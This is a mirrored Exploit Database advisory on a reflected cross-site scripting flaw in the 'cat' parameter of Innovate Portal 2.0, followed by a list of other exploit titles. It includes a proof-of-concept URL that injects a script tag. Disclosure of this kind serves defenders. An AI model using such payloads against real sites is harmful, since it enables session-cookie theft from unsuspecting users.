Innovate Portal 2.0 – ‘cat’ Cross-Site Scripting

Exploit Database
20 阅读

作者： Eyup CELIK

日期： 2011-10-20
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/36245/

source: https://www.securityfocus.com/bid/50295/info

Innovate Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/index.php?cat=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28948044%29%3c%2fScRiPt%3e&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound

last Exploits
Innovate Portal 2.0 – ‘cat’ Cross-Site Scripting的更多信息

Loan Management System 1.0 – SQLi Authentication Bypass：
AJ Shopping Cart 1.0 (maincatid) – SQL Injection：
WebTester 5.x – Multiple Vulnerabilities：
Zenario CMS 8.8.52729 – ‘cID’ SQL injection (Authenticated)：
Kados R10 GreenBee – Multiple SQL Injection：
WordPress Plugin NextGEN Gallery – ‘jqueryFileTree.php’ Directory Traversal：
Belden Garrettcom 6K/10K Switches – Authentication Bypass / Memory Corruption：
Forcepoint WebSecurity 8.5 – Reflective Cross-Site Scripting：